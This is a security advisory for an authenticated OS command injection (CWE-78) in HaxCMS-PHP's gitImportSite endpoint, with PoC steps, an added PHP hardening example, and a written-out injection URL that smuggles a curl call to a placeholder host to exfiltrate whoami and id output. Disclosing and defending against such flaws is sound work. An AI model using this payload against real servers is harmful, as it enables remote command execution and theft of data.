GHSA-g4cf-pp4x-hqgw

Source
https://github.com/advisories/GHSA-g4cf-pp4x-hqgw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-g4cf-pp4x-hqgw/GHSA-g4cf-pp4x-hqgw.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-g4cf-pp4x-hqgw
Aliases
Related
Published
2025-06-09T20:30:34Z
Modified
2025-06-09T21:44:11Z
Severity
  • 8.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
Summary
HaxCMS-PHP Command Injection Vulnerability
Details

Summary

The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The 'setremote' function later passes this input into 'proc_open', yielding OS command injection.

Details

The vulnerability exists in the logic of the 'gitImportSite' function, located in 'Operations.php'. The current implementation relies only on the 'filter_var' and 'strpos' functions to validate the URL, which is not sufficient to ensure the absence of all Bash special characters usable for command injection.

(screenshot: gitImportSite)
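The weakness described above has two halves: a permissive check (filter_var with FILTER_VALIDATE_URL and strpos accept shell metacharacters such as ';', '$', '(', ')', '{', '}' and '#') and a sink that hands the string to a shell. The following is an added example, not HaxCMS-PHP code, showing how both halves can be hardened in PHP: an allowlist validator for the remote URL, and a git invocation through proc_open's array form, which passes arguments directly to the program without any shell. The function names validate_git_remote_url and git_set_remote_safely, the $repoDir parameter and the sample URLs at the bottom are assumptions for the example.

```php
<?php
// Added example, not project code. Names and sample inputs are assumptions.

/**
 * Allowlist validation of a git remote URL. Unlike filter_var(), which
 * accepts most printable characters in the path and fragment, this only
 * admits http(s) scheme, DNS-style host labels, an optional port and
 * path segments made of [A-Za-z0-9._-].
 */
function validate_git_remote_url(string $url): bool
{
    if (strlen($url) > 2048) {
        return false;
    }
    $pattern = '~^https?://'
        . '(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*'  // subdomain labels
        . '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'          // final label
        . '(?::\d{1,5})?'                                           // optional port
        . '(?:/[A-Za-z0-9._-]+)*/?$~';                              // path segments
    if (preg_match($pattern, $url) !== 1) {
        return false;
    }
    // filter_var() is kept as a second opinion, but never as the only check.
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}

/**
 * Run git without a shell. proc_open() with an array command (PHP >= 7.4)
 * execs the program with literal arguments, so no metacharacter in $url is
 * ever interpreted. Returns the exit status and captured stderr.
 */
function git_set_remote_safely(string $repoDir, string $url): array
{
    if (!validate_git_remote_url($url)) {
        throw new InvalidArgumentException('rejected git remote URL');
    }
    $cmd  = ['git', '-C', $repoDir, 'remote', 'set-url', 'origin', $url];
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('failed to start git');
    }
    fclose($pipes[0]);
    stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[2]);
    return ['exit' => proc_close($proc), 'stderr' => $stderr];
}

// Constructed inputs: an ordinary repository URL, and a string of the shape
// the advisory describes (metacharacters inside the path). The validator
// accepts the first and rejects the second before any process is started.
var_dump(validate_git_remote_url('https://github.com/example/site.git'));
var_dump(validate_git_remote_url('http://192.0.2.10/.git;curl${IFS}x/$(whoami)#=a'));
```

The array form of proc_open is the decisive change: even if the validator were loosened, the URL would reach git only as a single argv entry. The allowlist remains worthwhile because git itself treats some URL shapes specially (for instance strings beginning with '-'), and the strict scheme-plus-host pattern keeps those out as well.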

Affected Resources

  • Operations.php:2103 gitImportSite()
  • <domain>/<user>/system/api/gitImportSite

PoC

To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note that a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

  1. Start a webserver. (screenshot: webserver)

  2. Initiate a request to the 'archiveSite' endpoint. (screenshot: archiveSite)

  3. Capture and modify the request in BurpSuite. (screenshot: request-modification)

  4. Observe command output in the HTTP request from the server. (screenshot: command-output)

Command Injection Payload

http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef

Impact

An authenticated attacker can craft a URL string that bypasses the validation checks employed by the 'filter_var' and 'strpos' functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.

Database specific
{
    "nvd_published_at": "2025-06-09T21:15:47Z",
    "cwe_ids": [
        "CWE-78"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-09T20:30:34Z"
}
References

Affected packages

npm / @haxtheweb/haxcms-nodejs

Package

Name
@haxtheweb/haxcms-nodejs
Purl
pkg:npm/%40haxtheweb/haxcms-nodejs

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
11.0.3